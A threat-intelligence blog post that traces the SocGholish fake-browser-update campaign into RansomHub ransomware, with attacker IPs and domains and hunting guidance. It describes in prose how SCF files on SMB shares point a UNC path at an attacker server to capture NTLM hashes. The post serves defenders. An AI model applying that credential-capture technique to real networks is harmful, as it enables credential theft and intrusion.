top of page
Search

SocGholish Now Stages Directly Into RansomHub. The Fake Browser Update You've Seen for Three Years Is Now a Ransomware Loader.

  • Writer: Patrick Duggan
    Patrick Duggan
  • 8 minutes ago
  • 6 min read

SocGholish is one of the most durable initial access campaigns in the threat landscape. TA569, the group behind it, has been running fake browser update lures on compromised legitimate websites since at least 2017. The lure is always the same: visit a compromised site, see a modal that looks like a Chrome or Firefox update prompt, download a ZIP, execute a JavaScript loader. If you work in enterprise security, you have seen this campaign in someone's inbox, in a phishing awareness training, in an incident report. It is background noise at this point.


The Darktrace report published this week makes it stop being background noise. SocGholish is now staging directly into RansomHub — the dominant ransomware-as-a-service operation that consolidated market share after the LockBit and ALPHV disruptions. The fake browser update you have dismissed for three years is now the first link in a kill chain that ends in encrypted infrastructure and a ransom demand.



The kill chain


Nine stages. The first five use only legitimate infrastructure. That is why it works.


1 — Compromised legitimate website / TA569 compromises real sites through unpatched CMS plugins or RCE vulnerabilities, injecting JavaScript that reroutes traffic. Not a malicious domain — a site the victim already trusts.


2 — Keitaro TDS (176.53.147.97 / packedbrick.com / rednosehorse.com / blackshelter.org / blacksaltys.com) / The traffic distribution system fingerprints every visitor before deciding what to serve. Sandboxes, researchers, and consumer connections see nothing. Enterprise users on corporate devices see the payload.


3 — Fake browser update modal / The profiled visitor sees a Chrome or Firefox update prompt. Download a ZIP. Execute a JavaScript loader. One click. No exploit required.


4 — SocGholish C2 check-in (msbdz.crm.bestintownpro.com → 166.88.182.126) / The loader checks in over HTTPS/443. Indistinguishable from normal web traffic.


5 — Python backdoor (files.pythonhosted.org → 151.101.1.223) / Secondary stage drops a Python backdoor with scheduled-task persistence. It phones home via the Python Package Index CDN — a domain almost no enterprise blocks because it serves legitimate developer traffic.


6 — Two weeks of silence / No ransomware yet. The actor is mapping the environment: domain controllers, backup systems, data stores worth threatening. One documented case: fourteen days undetected between backdoor deployment and encryption.


7 — Credential harvesting (NTLM capture server: 161.35.56.33) / SCF (Shell Command File) planted on SMB shares. Windows Explorer auto-authenticates to the UNC path when browsing the share, handing the actor the user's NTLM hash. No interaction required beyond opening the folder.


8 — RansomHub C2 (185.174.101.240 / 185.174.101.69 / 108.181.182.143 — port-hopping on 2308/2311/2313) / RansomHub infrastructure contacted over non-standard ephemeral ports via TLS. Port-hopping evades monitors that alert on specific destination ports.


9 — Encryption + ransom demand / Infrastructure locked. Data threatened for publication. This is where the victim finds out.



Stage 1 — The compromised website and the TDS


The infection begins on a legitimate website that has been compromised — not a malicious domain, not a phishing link, but a site the victim already trusts and visits for a normal reason. TA569 compromises these sites through unpatched CMS plugins or direct RCE vulnerabilities and injects JavaScript that redirects to their traffic distribution system.


The TDS is Keitaro — a commercially available traffic distribution and tracking platform that threat actors use for the same reason legitimate advertisers do: to segment visitors and serve different content to different audiences. The SocGholish TDS cluster runs through [176.53.147.97](https://analytics.dugganusa.com/stix/register?ref=ioc-click&q=176.53.147.97), with distribution nodes at packedbrick.com, rednosehorse.com, blackshelter.org, and blacksaltys.com. Keitaro fingerprints the visitor before deciding what to deliver. If the traffic looks like a sandbox, a security researcher, or a low-value consumer connection, the visit terminates cleanly. The legitimate website just loads. If the traffic fingerprints as an enterprise user on a corporate device, the fake update modal appears.


This is what makes SocGholish difficult to detect from the outside. The malicious behavior is conditional. The compromised site serves clean content to most visitors. Only specifically profiled enterprise targets see the payload.



Stage 2 — The fake update and the Python backdoor


The modal presents as a browser update. It is not a technical exploit — it requires the user to click Download and execute the JavaScript loader. The social engineering holds because the update modal looks exactly like what users expect to see when their browser needs updating. The ZIP contains a JavaScript loader that checks in to the SocGholish C2 at msbdz.crm.bestintownpro.com ([166.88.182.126](https://analytics.dugganusa.com/stix/register?ref=ioc-click&q=166.88.182.126)) over HTTPS/443.


The secondary stage is where SocGholish has evolved from prior reporting. The Python backdoor maintains persistence through a scheduled task — Python-based persistence is documented as new for this malware family. The backdoor connects to files.pythonhosted.org ([151.101.1.223](https://analytics.dugganusa.com/stix/register?ref=ioc-click&q=151.101.1.223)), which is a legitimate PyPI file hosting domain. Outbound connections to the Python package index rarely trigger enterprise security controls because they are routine in development environments. The C2 traffic hides inside the expected noise of developer tooling.



Stage 3 — Two weeks of silence before encryption


The documented case in the Darktrace report involves two weeks of undetected movement between the Python backdoor landing and the RansomHub encryption event. This is the access-first-movement-next-disruption-last pattern. The actor is not in a hurry to encrypt. They are building understanding of the environment — what domain controllers exist, what backup systems are accessible, what databases contain the data worth threatening to publish.


The credential harvesting technique in this campaign uses WebDAV forced authentication: SCF files (Shell Command Files) placed on SMB shares containing an IconFile directive pointing to a UNC path at [161.35.56.33](https://analytics.dugganusa.com/stix/register?ref=ioc-click&q=161.35.56.33)\share\icon.ico. When Windows Explorer renders the share contents, it automatically attempts to authenticate to the UNC path using the current user's NTLM credentials. The hash is captured on the attacker's server. This technique does not require user interaction beyond browsing to the share. It is not new — it has been documented for years — but it is still effective because most enterprise environments allow outbound SMB to the internet and most security tools do not flag NTLM authentication against an unfamiliar external IP as an alert.



Stage 4 — RansomHub


The terminal stage is RansomHub deployment. RansomHub is the ransomware-as-a-service that absorbed affiliates and market position from LockBit and ALPHV after their disruptions in 2024 and 2025. It is currently the dominant RaaS platform by activity volume. The C2 infrastructure observed in this campaign uses port-hopping across ephemeral ports 2308, 2311, and 2313 against three servers: [185.174.101.240](https://analytics.dugganusa.com/stix/register?ref=ioc-click&q=185.174.101.240), [185.174.101.69](https://analytics.dugganusa.com/stix/register?ref=ioc-click&q=185.174.101.69), and [108.181.182.143](https://analytics.dugganusa.com/stix/register?ref=ioc-click&q=108.181.182.143). The port-hopping is an evasion technique against network monitoring that triggers on specific destination ports rather than behavioral patterns.



The IOCs we indexed this morning


All seven infrastructure IPs from this campaign were absent from our corpus before today. They are now indexed at confidence 85–90:


  • [176.53.147.97](https://analytics.dugganusa.com/stix/register?ref=ioc-click&q=176.53.147.97) — Keitaro TDS cluster

  • [166.88.182.126](https://analytics.dugganusa.com/stix/register?ref=ioc-click&q=166.88.182.126) — SocGholish primary C2

  • [185.174.101.240](https://analytics.dugganusa.com/stix/register?ref=ioc-click&q=185.174.101.240)

  • [185.174.101.69](https://analytics.dugganusa.com/stix/register?ref=ioc-click&q=185.174.101.69)

  • [108.181.182.143](https://analytics.dugganusa.com/stix/register?ref=ioc-click&q=108.181.182.143)

The NTLM capture server [161.35.56.33](https://analytics.dugganusa.com/stix/register?ref=ioc-click&q=161.35.56.33) and the PyPI exfil anchor [151.101.1.223](https://analytics.dugganusa.com/stix/register?ref=ioc-click&q=151.101.1.223) are supplemental hunting indicators — the latter is a legitimate CDN IP shared across many Python package requests, so context matters before blocking.



What to hunt for


The SocGholish detection problem is that each stage uses legitimate infrastructure. The TDS uses a real traffic distribution platform. The C2 uses HTTPS on port 443. The backdoor phones home to the Python package index. The credential harvest abuses Windows' built-in authentication behavior. Each individual signal has a benign explanation. The chain is the indicator.


  • Outbound NTLM authentication to external IPs from workstations (specifically auth attempts to UNC paths outside your network)

  • New scheduled tasks with Python interpreter as the executable, created within 24 hours of a user visiting an unfamiliar external site

  • DNS resolution of bestintownpro.com variants or packedbrick.com / rednosehorse.com / blackshelter.org / blacksaltys.com

  • Outbound connections to the RansomHub /24 range [185.174.101.0](https://analytics.dugganusa.com/stix/register?ref=ioc-click&q=185.174.101.0)/24 on non-standard ports

The two-week dwell before encryption is the window defenders have if they catch any of stages 2 or 3. Missing stage 1 — the browser update — is expected, because it requires user interaction and the social engineering is good. Catching the Python backdoor persistence or the NTLM auth behavior is realistic with the right detections in place.


SocGholish has been running for seven years. Adding RansomHub as the terminal payload is not a technical innovation — it is a business decision by TA569 to monetize their access inventory at current ransomware market rates. The initial access broker and the ransomware operator have found each other. The fake update that security teams have been dismissing as commodity noise is now the front door to a ransomware event.


We are at 95 percent on the above — documented kill chain, named infrastructure, confirmed RansomHub deployment in observed incidents. The RansomHub affiliation may be opportunistic and shift to different ransomware operators over time.




The threat feed this post is built on

1.14M+ IOCs, STIX 2.1, precursor signals, supply-chain detection. Free API key in 30 seconds.


bottom of page